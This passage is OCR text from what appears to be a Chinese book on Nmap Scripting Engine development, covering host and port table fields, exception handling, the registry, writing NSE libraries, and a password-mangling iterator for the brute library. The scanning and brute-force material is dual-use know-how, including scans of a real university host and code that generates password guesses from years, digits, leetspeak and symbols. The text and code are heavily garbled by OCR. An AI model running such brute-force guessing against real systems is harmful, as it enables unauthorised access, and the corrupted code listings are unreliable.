hostbin ip 字段 中 的 内 容 是 使 用 4-byte 字符 串 表 示 的 IPv4 目标 地 址 以 及 使 用 16-byte F 
符 串 表示 的 IPv6 目标 地 址 ， 将 脚本 my-API-test 中 的 第 16 行 更 改 为 如 下 内 容 。 


return host.bin ip 


执行 结果 中 返回 的 host.bin ip 值 如 图 10-10 所 示 。 


第 10 章 NSE 中 的 API « 153 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:20 ?D1G+éx?8+7? 
Nmap scan report for bogon (10.16.39.23) 

Host is up (0.00078s latency). 

Not shown: 997 filtered ports 

PORT STATE SERVICE 


135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
MAC Address: 00:21:86:24:8E:F7 (Universal Global Scientific Industrial) 





Host script results: 
my-API-test: 1500 





Nmap done: 1 IP address (1 host up) scanned in 8.42 seconds 








图 10-9 执行 结果 中 返回 的 hostinterface mtu fii 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:22 ?D1ütéx?àr?? 
Nmap scan report for ww.tstc.edu.cn (211.81.200.8) 
Host is up (0.00775 latency). 

FONS record for 211.81.200.8: zygl.tstc.edu.cn 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

S0/tcp open http 

iii/tcp open rpcbind 

3306/tcp open mysql 

8009/tcp open ajpi3 

8192/tcp open sophos 





Host scr; 


L my-API-tes 


Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds 


VXD3QVxCBVx08 











图 10-10 执行 结果 中 返回 的 hostbin ip ff 


10. host.bin_ip_src 
host.bin ip src 字段 中 包含 两 个 地 址 ， 一 个 是 使 用 IPv4 格式 表示 所 使 用 的 计算 机 地 址 ， 
另 一 个 是 用 IPv6 格式 表示 所 使 用 的 计算 机 地 址 。 


11. host.times 
host.times 字段 中 的 内 容 是 目标 的 时 序数 据 ， 将 脚本 my-API-test 中 的 第 16 行 更 改 为 如 下 内 容 。 


return host.times 


执行 结果 中 返回 的 host.times 值 如 图 10-11 所 示 。 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:25 2?D16+Ex?8+?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 
Host is up (0.00655 latency). 

TONS record for 211.81.200.8: xsc.tstc.edu.cr| 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

B0/tcp open http 

111/tcp open rpcbind 

3306/tcp open mysal 

8009/tcp open ajpi3 

8192/tcp open sophos 


Host script results: 
| my-API-test: 

| rttvar: 6.002207 
| timeout: @.1 











Nmap done: 1 IP address (1 host up) scanned in 10.43 seconds 


图 10-11 执行 结果 中 返回 的 hosttimes 值 
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12. host.traceroute 

host.traceroute 字段 中 的 数据 只 有 在 指定 --traceroute 时 才 有 用 。 将 脚本 my-API-test 中 的 
B 16 行 更 改 为 如 下 内 容 。 

return host.traceroute 


执行 结果 中 返回 的 host.traceroute 值 如 图 10-12 所 示 。 


vr 








Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:26 ?D1útêx?êt?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 
Host is up (0.0076s latency). 

rDNS record for 211.81.200.8: www2.tstc.edu.cn 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

SO/tcp open http 

111/tcp open rpcbind 

3306/tcp open mysql 

8009/tcp open ajp13 

8192/tcp open sophos 





Host script results: 
my-API-test: 
| 


ip: 10.16.39.254 
name: bogon 
times: 

srtt: 0.002] 


ip: 172.16.21.13 
name: bogon 
times: 

srtt: 0.003 


ip: 172.16.21.130 
name: bogon 
times: 

srtt: 0.003 


ip: 211.81.200.8 
name: www2.tstc.edu.cn 
times: 

srtt: 0.007 




















图 10-12 ”执行 结果 中 返回 的 host.traceroute fii 


10.1.2 port table 
port table 也 是 以 Lua table 形式 存放 的 ， 接 下 来 分 别 介绍 其 中 包含 的 字段 。 


1. port.number 

portnumber 字段 标识 了 目标 端口 的 编号 ， 同 样 也 来 编写 一 段 脚本 ， 在 一 次 具体 的 扫描 的 
过 程 中 打印 输出 这 个 API， 如 图 10-13 所 示 。 

然后 以 211.81.200.8 为 目标 来 查看 这 次 扫描 过 程 中 产生 的 值 ， 如 图 10-14 所 示 。 


2. port.protocol 
port.protocol 字段 标识 了 目标 端口 的 类 型 ， 可 以 是 TCP 或 者 UDP， 将 my-API-test.nse 中 
的 返回 值 改 为 port.protocol， 执 行 的 结果 如 图 10-15 所 示 。 
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四 mw 


local shortport = require“shortport 
description = [[]] 
author = "Administrator" 


license = "Same as Nnap—See http://nmap. org/book/man-legal.html* 
categories = ('default^] 


portrule - function( host, port ) 
return true 
end 


action - function(host, port) 
return port. nunber| 


end 


图 10-13 添加 了 port.number 的 my-API-test.nse 








Starting Nmap 7.30 ( https://nmap.org ) at 2016- 
Nmap scan report for www.tstc.edu.cn (211.81.200. 
Host is up (0.0089s latency). 

rDNS record for 211.81.200.8: shkx.tstc.edu.cn 


Not shown: 994 closed ports 
poar STATE «EDVTCE 





31 12:33 ?D1útêx?êt?? 





) 





HMtcp. opem sah 
| my-API-test: 22 
80/tcp open http 
|.my-API-test: 80 
lll/tcp open rpcbind 
| my-API-test: 111| 
3306/tcp open mysql 

| my-API-test: 3306 
8009/tcp open ajpi3 

| my-API-test: 8009 
8192/tcp open sophos 
|.my-API-test: 8192 














Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds 








图 10-14 fH my-API-test.nse 打印 的 目标 端口 结果 


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:35 ?D1i+éx?é+7? 
Nmap scan report for wwi.tstc.edu.cn (211.81.200.8) 

Host is up (6.0080s latency). 

rDNS record for 211.81.200.8: juc.tstc.edu.cn 

Not shown: 994 closed ports 

PORT —— STATE SERVICE 





22/tcp open ssh 
| my-API-test: tcp 
88/tcp open http 
|.my-API-test: tcp 
111/tcp open rpcbind 
| my-API-test: tcp 
3306/tcp open mysql 
|-my-API-test: tcp 
8009/tcp open ajp13 

| my-API-test: tcp| 
8192/tcp open sophos 
| my-API-test: tcp 








Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds 











10-15 使 用 my-APLtestnse 打印 的 目标 协议 结果 


« 
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3. port.service 
port.service 字段 中 保存 了 端口 上 运行 的 服务 。 将 my-API-test.nse 中 的 返回 值 改 为 port. 
service， 执 行 的 结果 如 图 10-16 所 示 。 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:36 ?D1úżêx?ê+?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 
Host is up (0.0058s latency). 

rDNS record for 211.81.200.8: hqc.tstc.edu.cn 

Not shown: 994 closed ports 

PUKI SIAIE SEKVILE 

22/tcp open ssh 

|_my-API-test: ssh 

BO/tcp open http 

|_my-API-test: http 

111/tcp open rpcbind 

| _my-API-test: rpcbind 

3306/tcp open mysql 

| my-API-test: mysql 

8009/tcp open ajp13 

| my-API-test: ajp13 

8192/tcp open sophos 

| my-API-test: sophos 








Nmap done: 1 IP address (1 host up) scanned in 10.32 seconds 











图 10-16 使 用 my-API-test.nse 打印 的 目标 服务 结果 


4. port.version 

port.version 字段 中 保存 了 通过 服务 扫描 发 现 的 版 本 信息 ， 包 括 name, name confidence, 
product, version, extrainfo, hostname, ostype, devicetype, service_tunnel, service_ftp 以 及 
cpe code 等 字段 。 注 意 这 个 字段 需要 使 用 参数 -sV， 将 my-API-test.nse 中 的 返回 值 改 为 port. 
version， 具 体 命令 如 下 。 

Nmap -sV --script my-API-test www.tstc.edu.cn 


执行 的 结果 如 图 10-17 Bros o 








Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:38 ?D1útêx?ê+?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 

Host is up (0.0074s latency). 

rDNS record for 211.81.200.8: ghy.tstc.edu.cn 

Not shown: 994 closed ports 





22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 
| my-API-test: 
| name confidence: 10.0 

cpe: 


| 
| cpe:/a:openbsd:openssh:5.3 
| service tunnel: none 

| name: ssh 

| service_dtype: probed 

| 

IB 


version: 5.3 
product: OpenSSH 
extrainfo: protocol 2.0 














图 10-17 fH my-API-test.nse 打印 的 目标 服务 版 本 信息 
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5. port.state 
port.state 字段 中 保存 了 端口 上 运行 的 状态 ， 将 my-API-test.nse 中 的 返回 值 改 为 port. 
state， 执 行 的 结果 如 图 10-18 所 示 。 

















Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 12:41 ?D10+éx?8+?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 

Host is up (0.0097s latency). 

rDNS record for 211.81.200.8: hqc.tstc.edu.cn 


Not shown: 994 closed ports 
PORT STATE SERVICE 





22/tcp open ssh 
| my-API-test: open 
BO/tcp open http 
| my-API-test: open 
11l/tcp open rpcbind 
| my-API-test: open 
3306/tcp open mysql 
| my-API-test: open 
8009/tcp open ajpi3 
| my-API-test: open 
8192/tcp open sophos 
| my-API-test: open 











md done: 1 IP address (1 host up) scanned in 11.65 seconds 





图 10-18 {HJH my-API-test.nse 打印 的 目标 端口 上 运行 的 状态 


10.2 NSE 中 的 异常 处 理 


NSE 中 也 有 一 种 用 来 处 理 异 常 的 机 制 。 这 种 机 制 的 工作 方式 很 简单 ， 开 发 者 只 需要 将 
监控 异常 的 代码 放置 在 Nmap.new_try() 的 括号 中 即 可 。 这 个 函数 的 第 一 个 返回 值 就 表明 了 状 
态 。 如 果 返 回 值 为 false 或 者 nil， 第 二 个 返回 值 就 是 一 个 错误 相关 的 字符 串 。 

如 果 Nmap.new_try0 中 的 代码 出 现 异 常 ， 定 义 的 catch 函数 将 会 执行 。 如 下 代码 给 出 了 
一 个 范例 ， 在 例子 中 如 果 异 常 出 现 的 话 ，catch 函数 将 会 执行 垃圾 回收 机 制 。 


local catch = function() socket:close() end 
local try = Nmap.new try(catch) 


try( socket:connect(host, port) ) 
respoNSE - try( mysql.receiveGreeting(socket) ) 


这 里 编写 一 个 查看 目标 主机 上 finger 服务 的 实例 。 

这 个 脚本 其 实 和 上 面 的 脚本 很 相似 ， 但 是 这 里 需要 使 用 到 异常 处 理 。 在 程序 编写 时 使 用 
异常 处 理 是 一 个 很 好 的 习惯 。Nmap 中 同样 也 提供 异常 处 理 的 库 ， 而 这 个 库 的 名 字 恰 好 也 是 
Nmap, Nmap 中 提供 了 一 个 new_try0 方法 来 创建 一 个 新 的 异常 处 理 程序 handler。 此 函数 返 
回 一 个 异常 处 理 程序 功能 ， 用 这 个 handler 将 可 能 会 发 生 异 常 的 函数 包含 在 里 面 ， 在 执行 的 
时 候 ， 如 果 这 个 函数 出 现 了 异常 ， 它 的 返回 值 就 是 一 个 false 或 者 nil， 后 面 是 一 个 错误 的 消 
息 ， 如 果 成 功 执行 的 话 ， 它 的 返回 值 就 是 一 个 true， 后 面 是 一 些 其 他 结果 。 
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如 果 不 考 虑 异常 的 话 ， 这 个 程序 可 以 写成 如 下 形式 。 


portrule = shortport.port or service(79, "finger") 

action = function(host, port) 

return comm.exchange(host, port, "\r\n", (lines-100, timeout-5000)) 
end 


但 是 考虑 到 在 执行 comm.exchange 函数 时 ， 很 有 可 能 会 出 现 异 常 ， 那 么 产生 一 个 异常 处 
理 try。 

try = Nmap.new_try(catch) 

然后 将 comm.exchange 放 到 try 的 范围 内 。 

return try(comm.exchange(host, port, "Vrin", (lines-100, timeout-5000))) 

这 样 ， 如 果 comm.exchange 正常 执行 的 话 ， 就 可 以 返回 原本 的 值 ， 如 果 出 现 异 常 ， 就 可 
以 返回 这 个 异常 。 

这 个 程序 的 完整 代码 如 图 10-19 所 示 。 














local comm = require "comm" 

local nmap = require "nmap^ 

local shortport - require "shortport^ 

description - [[ 

Attempts to retrieve a list of usernames using the finger service. 
1 

author - "Eddie Bell* 

license = "Same as Nmap--See https://rmap. org/book/man-legal.htnl^ 
categories = ('default^, "discovery", “safe”} 


þortrule = shortport.port or service(79, "finger^) 


action - function(host, port) 
local try = nmap.new try() 


return try(comm exchange (host, port, "rin, 
{lines=100, timeout-5000])) 
end 





图 10-19 my-http-detect.nse 的 完整 代码 
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10.3 NSE 中 的 注册 表 


NSE 注册 表 也 是 一 个 lua table 类 型 的 数据 文件 ， 它 主要 用 来 保存 在 一 次 扫描 中 各 个 脚本 
之 间 共 享 的 变量 。 这 个 注册 表 保 存在 一 个 名 为 Nmap.registry 的 变量 中 。 举 个 例子 ， 在 使 用 
脚本 对 目标 的 口令 进行 暴力 破解 的 时 候 ， 就 可 以 使 用 这 个 注册 表 把 已 经 成 功 的 用 户 名 和 密码 
保存 起 来 ， 以 供 其 他 脚本 使 用 。 例 如 ， 破 解 得 到 了 目标 的 用 户 名 为 admin, 951379 123456, 
NSE 就 会 执行 一 个 插入 操作 。 


table.iNSErt(Nmap.registry.credentials.http, { username = admin, password 
7123456 } ) 





小 结 


使 用 Nmap 中 提供 的 API 是 编写 程序 时 的 最 大 优势 ， 本 章 详细 介绍 了 Nmap 中 的 两 个 最 
为 有 用 的 API : host table 和 port table， 并 详细 给 出 了 这 两 个 table 中 的 具体 内 容 。 此 外 还 介 
绍 了 如 何 利用 NSE 的 registry 在 脚本 中 共享 信息 以 及 如 何 处 理 Nmap 中 的 异常 。 





NSE 中 的 库 文 件 


跟 其 他 的 编程 语言 以 及 框架 相同 ，NSE 中 的 库 文件 实现 了 代码 的 分 离 和 重 构 ， 这 有 助 于 
对 脚本 的 开发 。 常 见 的 操作 如 网 络 套 接 字 连接 的 创建 、 有 效 的 登录 凭证 的 存储 或 者 从 命令 行 


读 取 脚本 的 参数 都 可 以 由 这 些 库 来 处 理 。Nmap 中 目前 拥有 
大 概 107 个 库 文 件 ， 这 些 库 文 件 涵盖 了 几乎 当前 所 有 的 流行 
协议 、 常 见 的 字符 串 处 理 操作 ， 甚 至 包含 了 用 来 实现 对 用 户 
名 和 密码 进行 破解 的 brute 库 文件 。 当 在 编写 NSE 脚本 的 时 
候 ， 你 可 能 会 考虑 到 代码 重 构 的 问题 。 最 好 的 解决 方法 还 是 
将 核心 的 代码 创建 为 NSE 的 库 文件 。 事实 上 ，NSE 库 文件 的 
创建 是 非常 简单 的 。NSE 中 的 库 文件 大 都 是 使 用 Lua 语言 编 
写 的 , 但 是 如 果 你 使 用 C 或 者 C++ 语言 也 是 可 行 的 。 

下 面 先 来 查看 一 下 这 些 库 文件 ， 在 Halcyon IDE v2.0 fff] 
左 侧 窗 口中 选中 “Nmap Libraries”。 图 11-1 中 列 出 的 就 是 
Nmap 中 的 库 文件 。 

在 这 一 章 中 将 会 学 习 以 下 内 容 。 

口 如 何 编写 NSE 库 文件 。 

口 扩展 一 个 NSE 库 文件 的 功能 。 

口 NSE 中 的 C/C++ 模块 。 

Q NSE 中 的 常见 库 文件 。 


Halcyon IDE 20 - IDE for Nmap Script Development. 








fie Edit Project Help 
ooo oooga o 


Nmap Scripts | NSE Data f Nmap Libraries 
CiPregram Filos BENN! 
D atp.ua 
D apua 
D amapiua 
Dy aryconnectiua 
D asntiua 
D bese3ziua 
D) base64 iua 


BD vniua 


CI 

















图 11-1 Nmap 中 的 库 文件 
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1.1 NSE 库 文 件 的 编写 


下 面 编写 一 个 简单 的 NSE 库 文件 。 首 先 要 注意 ，Halcyon_IDE_v2.0 编辑 器 中 并 没有 提供 
NSE 库 文件 编写 的 方式 ， 因 此 使 用 任意 一 款 编辑 器 来 编写 库 文件 并 没有 什么 区 别 。 

NSE 库 文件 的 默认 存储 位 置 为 Nmap 安装 目录 下 的 /NSElib/， 具 体 步 又 如 下 。 

步骤 1: 在 这 个 目录 中 创建 一 个 名 为 myfirstlib.lua 的 文件 ， 如 图 11-2 所 示 。 














IERI (C) » Program Files (x86) » Nmap » nselib » = r 
IAM 帮助 (H) 
刻录 Fbi 


2 aR 


. mstpuypes.iua 
T mssqllua 2 d Lua Script File 
T multicastlua Lua Script File 

| 二 myfirstlib.lua 2016/10/31 W3.. Lua Script File 
7. mysql.lua 2016/9/28 3.. Lua Script File 
7. natpmp.lua 2016/9/28 Æ. Lua Script File 











图 11-2 创建 一 个 名 为 myfirstlib.lua 的 文件 
步骤 2: 在 这 个 新 创建 的 文件 中 输入 如 图 11-3 所 示 的 内 容 。 


myfirstliblua -记事 二 [elem 


文件 日 ”编辑 (E) 格式 (Q) EEV 帮助 (H) 











function PrintPort (port) TE " 
return string. format ("The port 'Ns' is open", port) 
end 


£565,815 | 




















11-3 myfirstlib.lua 文件 中 的 内 容 


这 段 代 码 的 第 一 行 声明 了 所 需要 的 库 文件 ，stdNSE 库 文件 中 保存 了 一 些 用 来 处 理 输入 的 
函数 。 

local stdNSE - require "stdNSE" 

剩 下 的 部 分 是 一 个 函数 ， 这 个 函数 需要 一 个 参数 ， 它 将 这 个 参数 传递 给 stdNSE FE, JH 
于 格式 化 输出 format 函数 。 


function PrintPort (Port) 
return string.format("The port '$s' is open",port) 
end 


这 个 库 文件 完成 以 后 ， 对 其 进行 保存 ， 如 图 11-4 所 示 。 可 以 在 任何 的 脚本 中 调用 这 个 库 
文件 。 
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名 称 修改 日 期 am 

m. msrpetypesua ZU10/7/20 ER tua 3cnpt rue 
mssql.lua 2016/9/28 星期 Lua Script File 
multicast.lua 2016/9/28 星期 Lua Script File 
myfirstlib.lua 2016/10/31 Ei. Lua Script File 
mysql.lua 2016/9/28 RÀ. Lua Script File 

E natpmp.lua 2016/9/28 ŒA.. ^ Lua Script File 





图 11-4 可 以 被 调用 的 myfirstlib.lua 文件 
步骤 3 : 编写 一 个 脚本 my-library-test.NSE， 在 这 个 脚本 中 调用 这 个 库 文件 ， 如 图 11-5 


所 示 。 
| C:\Program Files (x86)\Nmapiscripts\imy-APLtest.nse | Cimyibrary-test.nse 

















2 local nyfirstlib = require “nyfirstlib” 


4 
S author = "Administrator" 
6 license = "Same as Nnap—See http://nnap. org/book/nan-legal. html” 


categories = ('default'] 





8 

9 

10 portrule = function( host, port ) 
11 Feturn true 

12 end 


15 action = function(host，port) 


19 end 














图 11-5 导入 了 myfirstlib 库 的 脚本 
步骤 4: 调用 这 个 函数 ， 如 图 11-6 所 示 。 





16 action = function(host, port) 
17 
18 return PrintPort (port. nunber] 
19 


20 end 








图 11-6 在 脚本 中 调用 PrintPort() 函数 
步骤 5. 脚本 编写 完成 以 后 ， 以 211.81.200.8 为 目标 执行 这 个 脚本 。 


Nmap -p 80 --script my-library-test 211.81.200.8 
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执行 的 结果 如 图 11-7 所 示 。 





Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-31 14:08 ?D1útêx?êt?? 
Nmap scan report for www.tstc.edu.cn (211.81.200.8) 

Host is up (0.0013s latency). 

rDNS record for 211.81.200.8: zzb.tstc.edu.cn 

PORT STATE SERVICE 


.my-library-test: The port '80' is open 


Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds 






图 11-7 使 用 my-library-test 脚本 扫描 的 结果 
好 了 ， 完 成 一 个 库 文件 是 不 是 并 没有 多 么 复杂 ? 


11.2 扩展 一 个 现 有 NSE 库 文件 的 功能 


NSE 库 的 功能 十 分 强大 且 全 面 ， 但 是 有 时 候 ， 可 能 要 根据 特殊 情况 对 这 些 库 进 行 修改 。 
例如 ， 在 对 目标 的 密码 强度 进行 审计 的 时 候 ， 可 能 需要 使 用 一 些 可 以 对 词汇 进行 处 理 的 工 
具 ， 然 后 再 运行 暴力 破解 。 为 了 简化 这 个 过 程 ， 可 以 对 NSE 中 的 brute 库 进行 改造 。 这 里 通 
过 对 brute 中 的 代码 进行 重 写 ， 来 实现 对 这 些 密码 的 组 合 进行 调整 。 

好 了 ， 现 在 开始 改写 这 个 函数 。 在 这 个 函数 中 ， 定 义 如 下 的 规则 。 

O digits : 列举 出 所 有 的 1 位 和 2 位 的 数字 组 合 ， 以 及 所 有 的 常见 数字 组 合 (例如 年 
份 等 )， 然 后 将 这 些 组 合 添加 到 当前 词汇 后 面 ， 例 如 原来 是 pass， 那 么 添加 完 就 是 
passl, pass2 等 。 

O strings: 对 字符 串 进行 常见 的 操作 ， 例 如 反 向 、 重 复 、 大 写 、 替 换 等 。 

O special: 向 字符 串 添加 特殊 的 字符 ， 例 如 !、$、# 等 。 

口 all: 这 个 规则 是 以 上 所 有 规则 的 组 合 。 

例如 一 个 单词 Hello， 因 为 这 是 一 个 简单 的 单词 ， 可 能 并 不 符合 成 为 一 个 密码 的 标准 ， 
因此 很 多 人 可 能 会 使 用 单词 加 其 他 字符 的 方式 ， 或 者 单词 进行 反 向 替换 之 类 的 操作 ， 按 照 如 
下 几 种 情况 进行 操作 。 

第 1 种 情况 

有 些 人 喜欢 使 用 单词 + 年份 的 方式 ,例如 hello2016、hello2015 等 ， 那 么 就 可 以 编写 一 个 
函数 来 实现 对 这 个 单词 的 扩展 ， 将 这 个 单词 与 最 近 十 年 的 年 份 进行 组 合 ， 如 图 11-8 所 示 。 

经 过 这 个 函数 处 理 之 后 ， 一 个 简单 的 单词 “world” 就 会 扩展 为 如 下 所 示 。 


world 2016 
world 2015 
world 2014 
world 2013 
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world 2012 
world 2011 
world 2010 
world 2009 
world 2008 
world 2007 





local year = tonumber (os. date ("KY^)) 


coroutine.yield( user, pass..year ) 


coroutine.yield( user, pass..year*l ) 
for i- year, year-10, -1 do 

coroutine.yield( user, pass..i ) 
end 





图 11-8 产生 最 近 十 年 年 份 的 代码 部 分 


第 2 种 情况 

有 些 人 喜欢 使 用 单词 + 数字 的 方式 ， 例 如 hellol, hello88 等 ， 那 么 就 可 以 编写 一 个 函数 
来 实现 对 这 个 单词 的 扩展 ， 将 这 个 单词 与 数字 进行 组 合 ， 首 先 看 一 下 与 一 位 数字 进行 组 合 ， 
实现 的 代码 如 图 11-9 所 示 。 





for i= 0, 9 do 
coroutine.yieldí user, pass..i ) 


end 


图 11-9 产生 从 0 到 9 数字 的 代码 部 分 
经 过 这 个 函数 处 理 之 后 ， 一 个 简单 的 单词 “hello ”就 会 扩展 为 如 下 所 示 。 


hello 0 
hello 1 
hello 2 





T 9 
将 这 个 单词 与 两 位 数字 进行 组 合 ， 实 现 的 代码 如 图 11-10 所 示 。 


for i= 0, 9 do 
for x = 0, 9 do 


coroutine. yield( user, pass..i..x ) 





Æ 11-10 产生 从 00 到 99 数字 的 代码 部 分 
经 过 这 个 函数 处 理 之 后 ， 一 个 简单 的 单词 “hello ”就 会 扩展 为 如 下 所 示 。 


hello 00 


hel 


hel 
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lo 01 


lo 99 


有 些 人 对 一 些 数 字 组 合 情 有 独 钟 ， 例 如 123456. 666666. 888888 等 ， 也 可 以 将 这 些 组 
合 添 加 到 密码 中 ， 实 现 的 代码 如 图 11-11 所 示 。 








coroutine.yield( user, pass.."123" ) 
coroutine.yield( user, pass.."1234" ) 
coroutine.yield( user, pass.."12345" ) 





1-11 将 密码 与 常用 数字 组 合 的 代码 


经 过 这 个 函数 处 理 之 后 ， 一 个 简单 的 单词 “hello” 就 会 扩展 为 如 下 所 示 。 


hel 
hel 
hel 


10123456 
lo666666 
10888888 


第 3 种 情况 
有 些 系统 的 密码 是 区 分 大 小 写 的 ， 而 有 时 有 些 人 喜欢 将 将 常见 单词 改变 后 作为 密码 ， 下 








El 








11-12 所 


这 上 
sec. 
sec 
sec 
sec. 
s3c 
SEC. 
S3C. 
sec 
ter 
Sec 


编写 一 个 函数 来 实现 基本 的 字符 操作 ， 例 如 大 写 、 反 向 、 替 换 、 重 复 等， 实现 的 代码 如 图 








示 。 

local leetify = {[rar] 2^4, le] 2^3, Ui] =r, [o] 2^0) 

local leetified pass = pass:gsub(" Xs, leetify) 

coroutine.yield( user, leetified pass ) 

coroutine.yield( user, pass:upper( ) 

coroutine.yield( user, leetified pass:upper() ) 

coroutine.yield( user, pass:lower() ) 

coroutine.yield( user, pass:reverse() ) 

coroutine.yield( user, pass:sub(l,l):upper(..pass:sub(2) ) 

coroutine. yield( user, leetified pass:sub(l, 1) zupper Ü.. leetified pass:sub(2) ) 

coroutine.yield( user, pass:rep(2) ) 

coroutine.yield( user, pass:rep(3) ) 

图 11-12 对 单词 进行 常见 变换 操作 的 代码 

EDI secret 为 例 ， 生 成 的 密码 如 下 。 





ret99 
ret123 
ret1234 
ret12345 
r3t 

RET 

R3T 

ret 

ces 

ret 
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S3cr3t 

secretsecret 

Secretsecretsecret 


同样 ， 也 可 以 在 这 些 密码 后 面 添加 特殊 字符 ， 图 11-13 是 添加 特殊 字符 的 代码 。 


coroutine.yield( user, pass..”$ 








coroutine.yield( user, pass.. # 
coroutine. yield( user, pass.. 
coroutine.yield( user, pass.. 


coroutine.yield( user, pass.. @ 





图 11-13 将 单词 与 常见 特殊 字符 进行 组 合 的 代码 
经 过 这 个 函数 处 理 之 后 ， 一 个 简单 的 单词 “hello ”就 会 扩展 为 如 下 所 示 。 


secret$ 
secret# 
secret! 
secret. 
secrete 


接 下 来 编写 一 个 pw_mangling_iterator 函数 来 实现 以 上 各 种 规则 。 上 面 提 到 的 都 是 一 些 


最 基本 的 规则 ， 你 可 以 编写 更 为 复杂 的 规则 来 解决 更 为 复杂 的 情况 。 


pw mangling iterator = function( users, passwords, rule) 
local function next credential () 

for user, pass in Iterators.account iterator(users, passwords, "pass") do 
if rule 'digits' or rule -- 'all' then 

今年 年 份 ， 去 年 的 年 份 ， 过 去 5 年 … 

local year = tonumber (os.date ("£Y")) 

coroutine.yield( user, pass..year 

coroutine.yield( user, pass..year*l ) 

for i = year, year-10, -1 do 

coroutine.yield( user, pass..i ) 

end 





-- 从 0 到 9 的 数字 
for i = 0, 9 do 
coroutine.yield( user, pass..i ) 
end 

-- 从 00 到 99 的 数字 
for i = 0, 9 do 
for x - 0, 9 do 
coroutine.yield( user, pass.. 
end 
end 





-- 常见 的 数字 组 合 
Coroutine.yield( user, pass.."123" ) 
Coroutine.yield( user, pass.."1234" ) 
coroutine.yield( user, pass.."12345" ) 
end 
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if rule -- 'strings' or rule -- 'all' then 
-- 基本 的 字符 操作 ， 例 如 大 写 、 反 向 、 替 换 、 重 复 等 
local leetify = (["a"] = '4', 
= 13r; 
='1', 





["o"] = '0'} 
local leetified_pass = pass:gsub("%a", leetify) 
coroutine.yield( user, leetified pass ) 
coroutine.yield( user, pass:upper() ) 
coroutine.yield( user, leetified pass:upper() ) 
coroutine.yield( user, pass:lower() ) 
coroutine.yield( user, pass:reverse() ) 
coroutine.yield( user, pass:sub(1,1):upper()..pass:sub(2) ) 
coroutine.yield( user, leetified pass:sub(1,1):upper()..leetified pass:sub(2) ) 
coroutine.yield( user, pass:rep(2) ) 
coroutine.yield( user, pass:rep(3) ) 
end 
if rule -- 'special' or rule -- 'all' then 

-- 常见 的 特殊 字符 例如 $、#、! 
coroutine.yield( user, pass..'$' 
coroutine.yield( user, pass..'#' 
coroutine.yield( user, pass..'!"' 
coroutine.yield( user, pass..'. 
coroutine.yield( user, pass..'@' 
end 
end 
while true do coroutine.yield(nil, nil) end 
end 
return coroutine.wrap( next credential ) 
end 


还 需要 在 brute 引擎 的 内 部 启动 函数 中 添加 一 个 新 的 脚本 参数 来 定义 brute 的 规则 。 

local mangling rules = stdNSE.get script args("brute.mangling-rule") or "all" 

在 这 个 例子 中 ， 同 样 需要 添加 一 个 elseif 分 支 语 句 ， 当 收 到 pass-mangling 作为 参数 时 来 
决定 执行 的 规则 。 














elseif( mode and mode -- 'pass' ) then 

Sself.iterator = self.iterator or Iterators.pw user iterator( usernames, 
passwords ) 

elseif( mode and mode 'pass-mangling' ) then 

self.iterator - self.iterator or Iterators.pw mangling iterator( usernames, 


passwords, 
mangling rules ) 
elseif ( mode ) then 
return false, ("Unsupported mode: $s"):format (mode) 


这 是 一 个 简单 的 迭代 器 函数 。 大 概 有 50 多 个 脚本 调用 了 brute.lua EXIF, 38ibxoT 3E 
代 器 函数 可 以 改进 它们 的 执行 效率 。 另 外 ， 从 这 个 例子 上 也 可 看 到 为 什么 要 强调 代码 重 构 的 
要 性 。 
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113 ”使 用 C/C++ 编写 的 NSE 模块 


对 于 一 些 习惯 使 用 C 和 C++ 的 程序 员 来 说 ，NSE 也 是 十 分 友好 的 。NSE H 
都 采用 C/C++ 进行 开发 。 对 这 些 语 言 的 支持 增强 了 NSE 的 性 能 。 





的 很 多 模块 


下 面 使 用 C 语言 来 编写 一 个 简单 的 NSE 库 ， 以 便 熟 悉 这 个 过 程 。 在 这 个 例子 中 的 CB 


块 中 只 包含 了 一 个 方法 ， 这 个 方法 实现 了 在 屏幕 上 输出 一 条 消息 。 
总 体 而 言 ， 在 NSE 中 获得 一 个 可 以 使 用 的 C 模块 的 步 又 如 下 。 
步骤 1: 将 头 文件 和 源 文件 放 到 Nmap 的 根 目录 下 。 
步骤 2: 向 makefile.in 文件 中 添加 源 文件 、 头 文件 和 对 象 文件 。 
步骤 3: 在 NSE.main.cc 文件 中 对 新 库 文件 进行 链接 操作 。 


首先 ， 创建 自 定义 的 头 文件 和 源 文件 。 将 C 语言 中 的 库 名 前 面 加 上 一 个 _NSE_ 的 字符 
串 ， 例 如 针对 库 test 就 要 命名 为 NSE_test.cc 和 NSE _testh。 然 后 在 NSE_test.cc 中 输入 如 下 


内 容 。 
extern "C" ( 
#include "lauxlib.h" 
finclude "lua.h" 
) 
#include "NSE test.h" 
Static int hello world(lua State *L) ( 
printf ("Hello World From a C libraryNMn"); 
return 1; 
) 
static const struct luaL Reg testlib[] - ( 
("hello", hello world), 
(NULL, NULL) 
N 
LuaLIB API int luaopen test(lua State *L) { 
luaL newlib(L, testlib); 
return 1; 


) 
然后 将 如 下 内 容 添加 到 NSE_testh 库 文件 中 。 


#ifndef TESTLIB 

#define TESTLIB 

#define TESTLIBNAME "test" 

LuaLIB API int luaopen test(lua State *L); 
#endif 


